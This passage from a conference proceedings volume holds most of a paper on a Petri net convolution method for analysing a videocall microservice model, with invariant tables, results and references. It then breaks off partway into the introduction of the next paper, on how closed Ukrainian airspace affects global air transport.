Rule 2. All sections of the submodel covered by automating and marked Petri nets are convoluting into one vertex of place. If the section is limited by the transition vertexes, it convolutes to the vertex of place that precedes it; if this vertex of place is overloaded with settings, then - to the vertex of place, which is the output vertex for this section. Thus, convolution actually occurs in a couple of vertexes –η(tst , pend ). Rule 3. When convoluting structures of the “critical section” type [15], a group of connected elements is convoluted into the transition vertex, which contains the elements of the model between the vertexes tV – tE . Rule 4. When allocating arbitrary cyclic constructions in a submodel or two adjacent submodels, such constructions are convoluted into a couple of vertexes η(pst , tend ) in which, if necessary, the corresponding values of control vectors are set. If there is an output transition vertex to the convoluted vertex of the place, in which the number and weight of input and output arcs do not change, the convolution takes place at vertex of place. Thus, when isolating arbitrary cycles, convolution occurs at a couple of vertexes p1 and t2 (Fig. 1). The vertex of the transition t2 is added to ensure compliance with the rules of the bipartite incompatible graph, which is the Petri net. But there are exceptions, when
Applying a Combined Approach to Modeling of Software Functioning
33
such structures are convoluting to the vertex of place. For example, when convoluting the structure (Fig. 2, a) into the vertex of the place p0 (Fig. 2, b), the need to add the transition vertex does not arise, the role of the connecting remains by the vertex t4 .
Fig. 2. Example of convolution of cyclic structures to the place vertex
Rule 5. If in the submodel the branched site of strongly connected elements limited by transitions vertexes is allocated, it is convoluted to the transition vertex; if such a section is bounded by place vertexes, it convolutes to the place vertex or to the type structure η(pst , tz , pend ), if it requires the adjustment of characteristics (e.g., time characteristics). Rule 6. If the allocated section of strongly connected elements starts from the place vertex and ends with the transition vertex, they are convoluting in a couple of vertexes η(pst , tend ) and the control vector is checked for debugging at the final transition vertex tend . If the convolution section starts at the transition vertex and ends at the vertex of the place, the convolution is a couple of vertexes η(pst , tend ), and the characteristics of the end vertex of the place need to be checked for limitation. Rule 7. Structures corresponding to PN-patterns of the first subgroup of the second group [14] can be convoluted into a structure of type η(pst , tz , pend ) with adjustment of the input control vector for the transition vertex tz . The algorithm of the method is presented in the activity diagram (Fig. 3). At the beginning of the work on the convolution of the submodel or the pair of adjacent submodels, have been selected sections for convolution, which are characterized by strong connectivity. Then it was determined whether the allocated sections intersect, in case if such sections were found, then the one that has more place vertexes and transition vertexes was convoluted. According to the convolution rules, the allocated areas were classified and the type of construction for the convolution of each of them was chosen. This convolution is performed sequentially with each of the selected sections. If a section intersects with another but has fewer vertexes, it does not convolute, but it is possible to consider convolution of such a section in subsequent iterations if it conforms to the convolution rules. The convolution method allows to reduce the large dimension of the partial model formed by combining submodels. This method is a part of the combined approach for the simulation systems with parallelism [2, 14]. The convolution method is used at the stage of assembling submodels to a partial model of the software for automated analysis
34
O. Suprunenko et al.
Fig. 3. Activity diagram of the convolution method for models of systems with parallelism
of its dynamic properties. It can also be used to prepare for the dynamic analysis of a submodel if it has a large dimension, i.e. if max(|T1 |, |P1 |) < (40 . . . 45). Dynamic analysis of software models allows to evaluate the following characteristics: • liveliness (reachability), which allows to eliminate redundant code, simplify testing of software models, • repeatability, which allows to select components for reuse, • preservation, ensuring the sustainable functioning of the model, • controllability, which indicates the correctness and predictability of the model in all possible use cases.
Applying a Combined Approach to Modeling of Software Functioning
35
3 Experiments We will focus on the results of the experimental supplement of the multimodal approach [2] to the problems of analyzing the code of microservices for videocalls, which operates as a component of the portal of a group of users of a social network of some organization. This microservice can be useful in videocalls for the three user categories: authorized users of the portal; customers, as portal pre-register users; outside users of the system without access to the portal (external guests. Before using the microservice, every customer or portal guest has to choose videocalls service on the web-portal page, external users are invited with the link. The microservice logon authorization will recognize the authorized user, but the customer has to input the name, which will be used during videocall session. Customers logon as authorized users but with restricted access rules, they cannot invite outside users to a videocall. Outside user after name input is waiting for the videocall inviting access from the portal customer. They have restricted access rules as portal guests too. With the purpose of the videocall microservice operation, the MV-1 model (4) is used, which describes the verification and logon phases of the three user categories, also it describes the user’s staying step and videocall logoff. Simulation modelling uses base settings of the model: μ0 (p0 ) = 5 and μ0 (p16 ) = 2, it means in this case, what 5 portal users and 2 invited guests want to connect to the videocall. Portal users can logon by entering the name and the password, or they can stay as a guest. Entering the videocall microservice (t 0 ) from the portal, the request (t 1 – p2 ) to the server is made and we have three variants of server using paths (from vertex of place p3 ): • be identified as a user (t 3 ), • be identified as a guest (t 4 ), • to receive an error message and go to the start page (t5 – p20 – t20 – p21 – t21 – p0 ). Portal guest makes the choice (at the vertex p5 ): to go to the start page and input login and password (t22 – p22 – t23 – p21 – t21 – p0 ), or to stay as a portal guest (p6 , p13 ). Starting from the transition vertex t8 , data validating about all users and portal guests has begun, as well as the registration of all users for the future video meeting. Also, if an error occurs in vertexes t25 (adding guest to the list of participants error), t27 (obtaining information about videocall error), t28 (accept connection error), processing is in progress and the transition to the place of vertex p19 will be done. Unless there are errors, from the vertex p11 in the transition vertexes t13 and t14 logon in videocall session of the portal user (p14 ) and guest (p15 ) is carried out. The guest can stay in videocall session, or can press the “Exit” (t29 ) button to leave it. An authorized user can allow external guests to logon, they are waiting for a connection (p16 ) and if they get a permit (t15 ) they can logon in videocall session (p15 ) and have access to the same function as guest portal. The authorized user can stay in the videocall (p14 ) or leave it (t17 ). The built model of videocalls microservice MV-1 (Fig. 4) is closed by its structure, that is, the base settings recover in it (from the transition vertex t30 ), which is the result of
36
O. Suprunenko et al.
an analytical study of the model [11]. The invariants for this model have been calculated: T1 T2 T3 T4 T5
= [5 = [5 = [1 = [5 = [5
5 5 1 5 5
5 5 1 5 5
0 0 0 5 5
5 5 0 0 0
0 0 1 0 0
5 5 0 0 0
5 5 0 0 0
5 5 0 5 5
5 5 0 5 5
5 5 0 5 5
5 5 0 5 5
5 5 0 5 5
0 0 0 5 5
5 5 0 0 0
2 0 0 2 0
2 0 0 2 0
0 0 0 5 5
7 7 0 7 7
0 2 0 0 2
0 0 1 0 0
0 0 1 0 0
0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
0 0 0 0 0
7 5 0 2 0
1]T 1]T 0]T 1]T 1]T
P = [1 1 1 1 1 1 1 1 1 1 1 1 0 0 1 1 1 1 1 1 1 1 1 1]
Fig. 4. Model of videocalls microservice MV-1
The analysis of T-invariants has revealed that the branch associated with repeated transition to the login and password entry page (t22 – p22 – t23 – p21 ) may not be used in the current work session (zero columns of the T-invariant for transition vertexes t22 and t23 ), i.e. related transition vertexes will never work. Since zero columns of T-invariants have been revealed for transition vertexes t24 , t25 , t26 , t27 , t28 , problems can also arise with vertexes that describe saving of the portal guest name in the database of videocall participants (from t24 and t26 ) and error handling. When analyzing the P-invariants, the elements related to place vertexes p12 and p13 have zero values due to violation of the markup preservation, the same is confirmed by simulation modeling. In order to consistently analyze several of the above-mentioned problems, we first will divide this model into three submodels, and reflect a separate problem in each of them. The first submodel MV-1-1 (Fig. 5) describes call preparation phases, the second submodel MV-1-2 (Fig. 6) describes error handling specifics, the third submodel MV1-3 (Fig. 7, b) describes a videocall processing with an option for portal user to invite external guests to the call, it also describes the videocall session logout.
Applying a Combined Approach to Modeling of Software Functioning
37
Fig. 5. The first submodel MV-1-1 of videocalls micrioservice model MV-1: a) initial MV-1-1, b) after the correctment MV-1-1p
The following values of T- and P-invariants are obtained from simulation modeling and analysis of the first submodel MV-1-1 (Fig. 5): T1 = [1 1 1 0 0 1 0 0 0 0 0 1 1 0 0]T T2 = [5 5 5 5 0 0 0 0 5 0 1 0 0 0 0]T T3 = [5 5 5 0 5 0 5 5 5 5 1 0 0 0 0]T P1 = [5 5 5 5 5 5 5 5 5 0 0 5 5] In particular, elements are not covered by nonzero values in T-invariants connected to vertexes and t2 , to vertexes p12 and p13 in P-invariants (Fig. 5, a). Such results of T-invariants analysis show that the path t22 – p22 – t23 – p21 , which is connected with password input by the portal guest, can work not in every session processing and it is necessary to take off this function to additional optional functions. The model is not preserved according to the results of P-invariants analysis, the portal guest’s statuses are unbalanced, that leads to bigger number of labels accumulation in vertexes p12 and p13 , than number of participants are staying at the preparation phase before joining the call. This fact is confirmed in simulation modeling of the submodel MV-1-1, so when restoring the initial markup (μ0 (p0 ) = 5), a single label is left in place vertex p12 , which means that one of participants has used the password input to change its guest status to an authenticated user. This analysis reveals that such portal guests’ statuses are not canceled which are going to the initial place vertex p0 through the branch t22 – p22 – t23 – p21 , which later leads to noncontrolled accumulation of labels in place vertex p12 (place vertex p13 is connected to this problem as the labels go though it), and it is critical for the submodel functionality. Therefore, the submodel is adjusted, in particular, the arc t4 – p13 is replaced by the arc t6 – p13 , which allows to take into account the portal guests during the videocall preparation phase at once. Thus, during the simulation modeling and analysis of the invariants of the first submodel MV-1-1, a violation of the preservation properties once has been found and priorities for basic and additional processes (X3 ) have been identified. The submodel MV-1-1p (Fig. 5, b), with the values of T- and P-invariants calculated for it, has become
38
O. Suprunenko et al.
the result of debugging: T1 T2 T3 T4
= [5 = [5 = [1 = [1
5 5 1 1
5 5 1 1
5 0 0 0
0 5 0 1
0 0 1 0
0 5 0 0
0 5 0 0
5 5 0 0
0 5 0 0
1 1 0 0
0 0 1 0
0 0 1 1
0 0 0 1
0]T 0]T 0]T 1]T
P1 = [5 5 5 5 5 5 5 5 5 0 0 5 5] P2 = [5 5 5 5 0 5 5 0 0 5 5 5 5] The analysis has revealed that all elements of T-invariants are covered by nonzero values, so this submodel is lively (all vertexes of transitions are reachable) and repetitive. The coverage of P-invariants by nonzero elements indicates the limitation and preservation of the submodel. Calculation of the rank of the incidence matrix (rang(W ) = 11) confirms the rather high controllability of the submodel (rang(W ) = 11 < min(|T1 |, |P1 |) = 13), which means that it is possible to achieve the majority possible markups from the initial markup. Incomplete controllability of the submodel may be related to its artificial closure for analysis. Thus, the operation of the submodel can be considered quite reliable. We will consider compliance with full controllability after adding the submodel to the full microservice model. The second submodel MV-1-2, shown in Fig. 6, a, is corrected due to the results of the analysis. In particular, the analysis has shown that only the first error (t25 ) is processed for the portal guest, the second and third errors (t27 , t28 ) are processed for users, although they may occur during the work of portal guests. In case of an error, users and guests of the portal go to the main page (p0 ) and the model should display their logoff (by reducing the labels in the appropriate vertexes p12 or p13 ).
Fig. 6. The second submodel MV-1-2 of videocalls microservice model MV-1: a) the initial submodel, b) the submodel MV-1-2v after debugging
Applying a Combined Approach to Modeling of Software Functioning
39
For the debugged submodel MV-1-2v the following values of invariants are obtained: T1 = [5 5 5 5 5 0 5 0 0 0 0 0 0 0 0 1]T T2 = [5 5 5 5 0 5 0 5 0 0 0 0 0 0 0 1]T T3 = [5 0 0 0 0 5 0 0 5 5 0 0 0 0 0 1]T T4 = [5 5 0 0 5 0 0 0 0 0 0 5 0 0 0 1]T T5 = [5 5 0 0 0 5 0 0 0 0 0 0 5 0 0 1]T T6 = [5 5 5 0 5 0 0 0 0 0 0 0 0 5 0 1]T T7 = [5 5 5 0 5 0 0 0 0 0 0 0 0 5 0 1]T T8 = [5 0 5 5 5 0 5 0 5 0 5 0 0 0 0 1]T T9 = [5 0 5 5 0 5 0 5 5 0 5 0 0 0 0 1]T T10 = [5 0 0 0 5 0 0 0 5 0 5 5 0 0 0 1]T T11 = [5 0 0 0 0 5 0 0 5 0 5 0 5 0 0 1]T T12 = [5 0 5 0 5 0 0 0 5 0 5 0 0 5 0 1]T T13 = [5 0 5 0 0 5 0 0 5 0 5 0 0 0 5 1]T P1 = [1 1 1 1 1 0 0 0 1 1] P2 = [1 0 0 0 0 1 1 1 1 1] The analysis of T-invariants of the second submodel MV-1-2v has shown that all their elements are covered by nonzero values, so the second submodel is lively and repetitive. Also, all elements of P-invariants are covered by nonzero values, which confirms the properties of limitation, preservation. The calculation of the rank of the incidence matrix confirms the sufficient controllability of the submodel: (rang(W2v ) = 8 < min(|T2v |, |P2v |) = 10). The analysis of the second submodel has revealed duplication in the branches from the place vertexes p1 and p5 (Fig. 6, b). This submodel is rebuilt with maintaining functionality (Fig. 7, a). The number of elements of the second submodel has been reduced: the number of transition vertexes decreased by 12.5%, the number of place vertexes – by 20%, the number of arcs – by 33.3%. The calculated elements of Tand P-invariants according to the reconstructed submodel MV-1-2p are covered with nonzero values and correspond to the properties of liveliness, repeatability, limitation and preservation: T1 T2 T3 T4 T5 T6 T7
= [0 = [5 = [0 = [5 = [0 = [5 = [0
0 5 0 0 0 5 0
5 0 5 0 5 0 5
5 0 0 0 5 0 5
5 0 0 0 0 0 5
5 0 0 0 0 0 0
0 5 0 0 0 0 0
5 5 0 0 0 0 0
1 1 1 1 1 1 1
0 0 5 0 0 0 0
0 0 0 5 0 0 0
0 0 0 0 5 0 0
0 0 0 0 0 5 0
0]T 0]T 0]T 0]T 0]T 0]T 5]T
P1 = [5 5 5 5 5 5 5 5] The calculation of the rank of the incidence the submodel MV-1-2p con matrix of firms a rather high controllability: rang W2p = 7 < min T2p , P2p = 8. Thus, the
40
O. Suprunenko et al.
Fig. 7. The second and the third submodels of the videocall microservice model MV-1: a) the second rebuilt submodel MV-1-2p, b) the third submodel MV-1-3
operation of the second submodel can be considered reliable enough and considered as a part of a complete microservice model. In the analysis of the third submodel MV-1-3 (Fig. 7, b) T- and P-invariants, in which all their elements are completely covered by nonzero values, have been calculated: T1 T2 T3 T4
= [5 = [5 = [0 = [0
0 0 5 5
5 5 5 5
0 0 5 5
5 5 0 0
2 0 2 0
2 0 2 0
0 0 5 5
7 7 7 7
0 2 0 2
7 5 2 0
1]T 1]T 1]T 1]T
P1 = [1 1 1 0 0 1 1 1 1 1 1] P2 = [5 0 0 5 5 5 5 5 5 5 5] The analysis of invariants of the submodel MV-1-3 has confirmed the compliance with the properties of liveliness, repeatability, limitation and preservation. The rank of the incidence matrix rang(W3 ) = 9 < min(|T3 |, |P3 |) = 11, which corresponds to a sufficiently high controllability of the third submodel of the videocall microservice. Compliance with the complete controllability of this submodel will be considered, when the submodel will be added to the full microservice model. The submodels are optimized by using the convolution method during assembling the complete videocall model. The view of the submodel MV-1-1 after convolution (model MV-1-1z) is presented in Fig. 8. Characteristics of the submodel MV-1-1z, represented by T- and P-invariants, remain completely covered by nonzero values: T1 T2 T3 T4
= [5 = [1 = [5 = [1
5 0 0 0
0 0 5 1
0 1 0 0
0 0 5 0
5 0 5 0
0 0 5 0
1 0 1 0
0 0 0 1
0]T 1]T 0]T 1]T
P1 = [1 1 1 1 1 0 0 1] P2 = [1 1 0 1 0 1 1 1]
Applying a Combined Approach to Modeling of Software Functioning
41
The rank of the incidence matrix for the first convoluted submodel MV-1-1z is rang(W1z ) = 6 < min(|T1z |, |P1z |) = 8. At the first stage of the assembly, we will connect the first MV-1-1z and the second MV-1-2p submodels into a partial model MV-(1z)-(2p) (Fig. 9). Since duplicate branches from the place vertex p5 (Fig. 6, b) are excluded from the second submodel, then in the first submodel (Fig. 5, b) the vertexes p9 and p10 with input and output arcs should be excluded, respectively. Connecting vertexes are also excluded, ensuring the closure of submodels, in particular, in the second submodel of the vertexes p0 , t0 , t2 (Fig. 7, a), which coincides accordingly with the vertexes p1 , t4 , t1 of the first submodel (Fig. 8). Simulation of the partial model of the MV-(1z)-(2p) has established that the initial markup is restored.
Fig. 8. First submodel MV-1-1z after convolution
Fig. 9. Partial model MV-(1z)-(2p) at the first stage of assembly of the model MV-1z
During the calculation of the incident matrix rank for the partial model MV-(1z)-(2p) rang(W1−2 ) = 10 < min(|T1−2 |, |P1−2 |) = 11 the high controllability of the partial model is determined, but still the controllability is not yet complete. The calculation of
42
O. Suprunenko et al.
invariants for the model MV-(1z)-(2p) yields the following results: T1 T2 T3 T4 T5 T6 T7 T8 T9
= [1 = [5 = [1 = [5 = [5 = [5 = [5 = [5 = [5
0 5 0 0 0 5 0 5 0
0 0 1 5 5 0 5 0 5
1 0 0 0 0 0 0 0 0
0 0 0 5 5 0 5 0 5
0 5 0 0 0 0 0 5 0
0 5 0 0 0 0 0 0 0
0 5 0 5 0 0 0 0 0
0 0 1 0 0 0 0 0 0
1 0 1 0 0 0 0 0 0
0 1 0 1 1 1 1 1 1
0 0 0 5 0 0 5 0 5
0 0 0 5 0 0 0 0 5
0 0 0 5 0 0 0 0 0
0 0 0 0 5 0 0 0 0
0 0 0 0 0 5 0 0 0
0 0 0 0 0 0 5 0 0
0 0 0 0 0 0 0 5 0
0]T 0]T 0]T 0]T 0]T 0]T 0]T 0]T 5]T
P1 = [1 1 1 1 1 1 1 1 1 1 1] The analysis of T-invariants of the partial model MV-(1z)-(2p) has shown that all elements are covered with nonzero values, which corresponds to the observance of liveliness and repeatability properties. Also all elements of the P-invariant are covered with nonzero values, which corresponds to the observance of limitation and preservation properties. In the second stage of assembly, the MV-1z model is connected to the partial model MV-(1z)-(2p) (Fig. 9) and to the third submodel MV-1-3 (Fig. 7, b). When assembling them from the third submodel, connecting vertexes are removed, in particular, p3 , t3 , t4 , p12 , p13 , as well as conventional structures at the vertexes p11 , p12 , t13 and p11 , p13 , t14 , which are responsible for logging users, taking into account labels from duplicate branches. In the model MV-1z (Fig. 10), the logon of users and guests of the portal to the videocall session is described by the vertexes p12 and p11 , respectively. External guests wait for permission to logon to the videocall displayed by the vertex p13 . The results of the analysis of T-invariants of the MV-1z model have shown that not all elements are covered with nonzero values. Thus, the transition vertexes t16 and t18 are not lively in these model simulation sessions, both vertexes describe the processing of errors that do not occur very often, so these results are not critical. Vertexes t16 and t18 can work under certain conditions, which are reflected in the model, they represent error processing, similar to the error processing in the branch passing through the vertex t14 . The processing of these errors is provided on the linear part of the code (p8 – t11 – p9 – t12 – p10 – t13 ), so they can be convoluted.
Applying a Combined Approach to Modeling of Software Functioning
43
Fig. 10. Model MV-1z after three submodels assembling
All elements of the S-invariant are covered with nonzero values, which corresponds to the observance of limitation and preservation properties. T1 T2 T3 T4 T5 T6 T7 T8 T9
= [7 = [7 = [7 = [7 = [7 = [7 = [7 = [7 = [7
0 0 5 0 5 5 5 5 5
6 6 1 6 1 1 1 1 1
1 1 1 1 1 1 1 1 1
5 5 0 5 0 0 0 0 0
0 0 5 0 5 0 0 5 5
0 0 5 0 5 0 0 0 0
7 7 7 2 7 2 2 2 2
1 1 1 1 1 1 1 1 1
2 2 2 2 2 2 2 2 2
1 1 1 1 1 1 1 1 1
5 5 0 0 0 0 0 0 0
5 5 0 0 0 0 0 0 0
5 5 0 0 0 0 0 0 0
0 0 0 5 0 0 0 0 0
0 0 0 0 0 5 5 0 0
0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 5 5
0 0 0 0 0 0 0 0 0
7 5 2 0 0 2 0 2 0
0 0 5 0 5 0 0 0 0
0 0 5 0 5 0 0 0 0
2 0 2 0 0 2 0 2 0
2 0 2 0 0 2 0 2 0
0]T 2]T 0]T 2]T 2]T 0]T 2]T 0]T 2]T
S1 = [14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14] The rank of the incident matrix (16 × 25) for the model MV-1z is 16: rang(WMV 1z ) = 16 = min(|TMV 1z |, |PMV 1z |) = 16, which determines the complete controllability of the assembled model. The results of the correction of the model MV-1z are presented in Fig. 11, this model is designated as MV-1z(1).
44
O. Suprunenko et al.
Fig. 11. Corrected model MV-1z(1)
During the invariants calculating of the corrected model MV-1z(1), the following results are obtained: T1 = [5 0 5 0 5 0 0 2 0 0 1 0 0 0 5 0 0 2 0 0]T T2 = [1 0 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0]T T3 = [5 0 5 0 5 0 0 2 0 0 1 0 0 2 5 0 2 0 2 0]T T4 = [5 5 0 0 0 0 0 2 0 0 1 0 0 0 0 5 0 2 0 0]T T5 = [1 0 1 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0]T T6 = [5 0 5 0 5 0 0 7 0 0 1 5 5 5 0 0 0 2 0 5]T T7 = [5 5 0 0 0 0 0 2 0 0 1 0 0 2 0 5 2 0 2 0]T T8 = [5 5 0 0 0 0 0 2 0 0 1 0 0 4 0 5 2 0 0 2]T T9 = [5 0 5 0 5 0 0 7 0 0 1 5 5 9 0 0 2 0 0 7]T T10 = [5 0 5 0 5 0 0 7 0 0 1 5 5 0 0 0 0 2 5 0]T T11 = [5 5 0 0 0 5 5 7 0 0 1 0 0 4 0 0 2 0 0 7]T T12 = [5 0 5 0 5 0 0 7 0 0 1 5 5 2 0 0 2 0 7 0]T T13 = [5 5 0 0 0 5 5 7 0 0 1 0 0 0 0 0 0 2 0 5]T S1 = [14 14 14 14 14 14 14 14 14 14 14 14 14] The result of the analysis of T-invariants of the MV-1z(1) model has shown that all their elements are covered by nonzero values, which means that all transition vertexes of the model are lively, and the network is repetitive. All elements of the P-invariant are covered by nonzero values, which corresponds to the observance of the limitation and persistence properties. The rank of the incident matrix confirms the complete controllability of the corrected model MV-1z(1): rang(WMV −1z1 ) = 13 = min(|TMV −1z1 |, |PMV −1z1 |) = 13. Thus, in the model MV-1z(1), compliance with dynamic characteristics is fully confirmed, it can be used to correct the microservice project. It can also be supplemented with other models, in which the above dynamic characteristics are observed.
Applying a Combined Approach to Modeling of Software Functioning
45
4 Results The characteristics of the built submodels and the videocall microservice model are presented in Table 1. As can be seen from the table, the built submodels are rebuilt until the elements of the T- and P-invariants are completely covered by nonzero values, and also until they are completely controllable. In submodels, the rank of the incidence matrix remains one or two units less than the minimum power of the smallest set of transition vertexes |T | or place vertexes |P|, due to the use of additional vertexes that do not reflect the basic logic of the microservice, to ensure the closure of the model. Table 1. Characteristics of models built within the analysis of the videocall microservice model №
Model
1
MV-1
31
24
−7
−2
23
non full
2
MV-1-1
15
13
−2
−2
11
non full
3
MV-1-1p
15
13
full
full
11
non full
4
MV-1-1z
10
8
full
full
6
non full
5
MV-1-2
16
10
full
full
8
non full
6
MV-1-2p
14
8
full
full
7
non full
7
MV-1-3
11
11
full
full
9
non full
8
MV-1z-2p
19
11
full
full
10
non full
9 10
Power of the set of transition vertexes |T |
Power of the set of places vertexes |T |
Coverage T-invariants
Coverage P-invariants
Rank of the matrix W
Controllability and coverage P-invariants
MV-1z
25
16
−2
full
16
full
MV-1z(1)
20
13
full
full
13
full
When assembling the model, a decrease in the dissimilarity between rang(W ) and min(|T |, |P|) is observed, which is associated with gradual debugging of the model and decreasing of the number of additional vertexes, and is reflected by the controllability property (Fig. 12).
46
O. Suprunenko et al.
Fig. 12. Controllability property of submodels, partial model and the full model of videocall microservice
5 Discussion Submodels can have a slight dissimilarity of the rank of the incidence matrix WM with the minimum power of the set of places vertexes or the set of transition vertexes min(|TM |, |PM |), which is often caused by the requirement of additional vertexes to submodels closuring. Such a closuring is required for analysis with the definition of invariants. When assembling submodels in partial models, the difference between the rank of the matrix WM and min(|TM |, |PM |) will decrease if the rank of the matrix does not indicate the requirement of a deadlock [11], and in the full model it should be zero: rang(WM ) = min(|TM |, |PM |). In cases where the difference between rang WM and min(|TM |, |PM |) is caused by certain problems in the operation of the model, these problems should be identified when analyzing the invariants of the partial or complete model. If fully corrected modules are connected to a fully corrected model, then its characteristics do not change.
6 Conclusions The paper presents a convolution method that reduces the dimensionality of the simulation model based on the Petri net by transforming the models of software components. This transformation is carried out in preparation for the analysis of dynamic characteristics by the invariant method. The application of the convolution method as a part of the combined approach to simulation modeling of systems with parallelism is shown in the videocall microservice model. The simulation microservice model based on Petri nets is constructed, its dynamic properties are analyzed, the problems are revealed. According to the results of the analysis, the model is divided into three submodels, each of which describes a separate problem. Submodels are analyzed and solutions to overcome the identified problems are proposed. When analyzing and recomposing submodels into a holistic model, the size of the model is reduced by 35% (power of the set of transition vertexes |T |). The proposed solutions are fully consistent with the properties of liveliness, limitation and preservation [11]. The conditions of full controllability of the model are also observed, which is an
Applying a Combined Approach to Modeling of Software Functioning
47
important indicator of the quality of the proposed design solutions. The obtained model MV-1z (1) can be used to correct the code of videocall microservice in order to increase the reliability of its operation and facilitate maintenance of the studied microservice. The scientific novelty of the presented work consists in proving the possibility of applying a combined approach to simulation modeling of systems with parallelism in the case when the studied system will be divided into several subsystems for the convenience of analysis. At the same time, the analysis of dynamic properties according to the proposed method of the combined approach requires artificial closure of subsystems, for which additional arcs are used. Such a solution leads to a decrease in the controllability of the subsystems (rang(Wi ) < min(|Ti |, |Pi |) even in the case of correction of the detected conflict situations. But when assembling the subsystems into a complete system, it is possible to achieve full controllability of the system if all detected errors are corrected. The practical value of the work lies in the extension of the application of the combined approach to simulation modeling of systems with parallelism together with the convolution method to identify potential explicit and implicit conflict situations in software models, as well as to check corrective design solutions that increase software reliability and facilitate its exploitation. Further research on this topic will be devoted to increasing the effectiveness of the use of tools for building a simulation model and its correction when conflict situations are detected. Some solutions to this problem have been presented in [2] and [15].
References 1. Sommerville, I.: Software Engineering, 6th edn., p. 693 Addison Wesley. Long.man Publishing Co., Inc., Lebanon (2001). ISBN 978-0-201-39815-1 2. Suprunenko, O.: Combined approach architecture development to simulation modeling of systems with parallelism. East.-Eur. J. Enterp. Technol. 4(112), 74–82 (2021). https://doi. org/10.15587/1729-4061.2021.239212 3. Stoian, V.A.: Modeling and Identification of System Dynamics with Distributed Parameters. Kyivskyi Universytet, Kyiv (2008) 4. Nesterenko, B.B., Novotarskiy, M.A.: Formal Tools for Modeling Parallel Processes and Systems. Prazi Instytutu Matematyky NAN Ukrainy. 90. Instytut matematyky, Kyiv (2012) 5. Jensen, K., Rozenberg, G.: High-level Petri Nets: Theory and Application. Springer, Heidelberg (2012). https://doi.org/10.1007/978-3-642-84524-6 6. Boer, E.R., Murata, T.: Generating basis siphons and traps of Petri nets using the sign incidence matrix. IEEE Trans. Circuits Syst. I: Fundam. Theory Appl. 41(4), 266–271 (1994). https:// doi.org/10.1109/81.285680 7. Glomodza, D.K.: Application of the invariant method to the analysis of colored Petri nets with deadlocks. Visnyk NTUU KPI. Informatyka, Upravlinnia ta Obshysluvalna Technika 64, 38–46 (2016) 8. Genovese, F.R.: The Essence of Petri Net Gluings (2019). https://www.researchgate.net/pub lication/335712908_The_Essence_of_Petri_Net_Gluings 9. Lomazova, I.A.: Nested Petri Nets: Modeling and Analysis of Distributed Systems with an Object Structure. Nauchny Mir, Moscow (2004) 10. Peterson, J.L.: Petri Net Theory and the Modeling of Systems. Prentice-Hall, Englewood Cliffs (1981)
48
O. Suprunenko et al.
11. Suprunenko, O.O., Onyshchenko, B.O., Grebenovych, J.E.: Analysis of hidden errors in the models of software systems based on Petri nets. Electron. Model. 44(2), 38–50 (2022). https:// doi.org/10.15407/emodel.44.02.038 12. van der Aalst, W.M.P.: Business process management: a comprehensive survey. ISRN Softw. Eng. 1–37 (2013). https://doi.org/10.1155/2013/507984 13. van Hee, K., Sidorova, N., Voorhoeve, M.: Soundness and separability of workflow nets in the stepwise refinement approach. In: van der Aalst, W.M.P., Best, E. (eds.) ICATPN 2003. LNCS, vol. 2679, pp. 337–356. Springer, Heidelberg (2003). https://doi.org/10.1007/3-54044919-1_22 14. Vasil’ev, V.V., Kuzmuk, V.V.: Petri Nets, Parallel Algorithms and Modeling of Multiprocessor Systems. Naukova dumka, Kyiv (1990) 15. Suprunenko, O.O., Grebenovych, J.E.: Instrumental Tools for Component-Oriented Modeling of Software Systems and PN-Patterns: Monograph. Publisher Chabanenko Yu.A, Cherkasy (2022)
System Information Technology in Complex Systems Modeling
Impact of Closed Ukrainian Airspace on Global Air Transport System Oleg Ivashchuk(B) and Ivan Ostroumov National Aviation University, Kyiv, Ukraine [email protected]
Abstract. Ukrainian airways network is a part of global air transportation system. Russian military invasion into Ukraine on February 24, 2022 has resulted in the closure of a huge part of air traffic network that causes serious problems for global air transportation. The geometry of closed airspace seriously affects direct connections from Asia to North America and European countries. In the paper, we provide a statistical analysis of scheduled air traffic with a direct connection from airports inside Ukraine. An air traffic loss is estimated by cumulated functions of total trajectory length, total flight time, number of seats not provided, and parameter of available seats-kilometer. Distribution of these parameters is studied by each airline. Also, we provide an analysis of re-planned trajectories for transit flights in closed airspace. Obtained results indicate a significant increase in trajectory length, flight time, amount of fuel burned, and additional carbon emission into the atmosphere. Keywords: Modeling of air traffic · statistical analysis · air transport system · Ukrainian airspace · air traffic flow
1 Introduction Aviation plays an important role in the global transport system. Air transport makes it possible to move passengers and cargo quickly over long distances around the globe. Airplanes use a wide network of airways, structured by altitude, to travel conveniently and quickly between any places in the whole world. Millions of people use air transport every year. In 2019, passenger traffic reached 8.6 billion in revenue per passengerkilometers which was 4.9% higher than in 2018 [1]. It indicates the high interest in this type of transport in different sectors of business. A global pandemic of Covid-19 caused a drop in demand for air transport and reduced the speed of aviation development [2–4]. The result of multiple restrictions and closed airspaces around the world led to reduced revenue passenger-kilometers parameter of 90% in the second quartile of 2020 compared to the pre-pandemic period of 2019 [5]. The civil aviation market demonstrates a slow rate of development due to multiple domestic restrictions and correlation with economy level development [6, 7]. In addition to Covid-19 pandemic disaster, global air transportation system was affected by simultaneously closed huge parts of airspace caused by Russia’s military © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 51–64, 2023. https://doi.org/10.1007/978-3-031-35467-0_4
52
O. Ivashchuk and I. Ostroumov
invasion of Ukraine at the end of February 2022. The whole Ukrainian, Belorussian, and limited Russian airspace volumes have been closed [8]. In total all these volumes together built a barrier for airflows from Asian countries to Europe and North America. Hundreds of flights have been re-planned to avoid entering risky regions. Subpolar flights from North America to Central Asia now are flying around closed volume, which, due to its geographical location, significantly increases the length of the route, which increases fuel costs and CO2 emissions. In addition, this situation caused unrest in the insurance and leasing aviation market, which also created additional difficulties for air carriers. Since the beginning of Russia’s military invasion into Ukraine, various sanctions have been used against Russia, including against aviation. Many countries around the globe closed their airspaces for aircraft registered in Russia. As a result, thousands of flights have been canceled. In order to hold potential connections with Russian airlines, passenger flows through a number of Asian airports-hubs are re-planned. Due to military actions, the whole airspace volume of Ukraine is still closed. All flights have been canceled for departure and destination airports within Ukrainian airspace. In the current study, we estimate the impact of closed Ukrainian airspace on global air transport system. The main objective of article is to perform a preliminary analysis of losses in air navigation 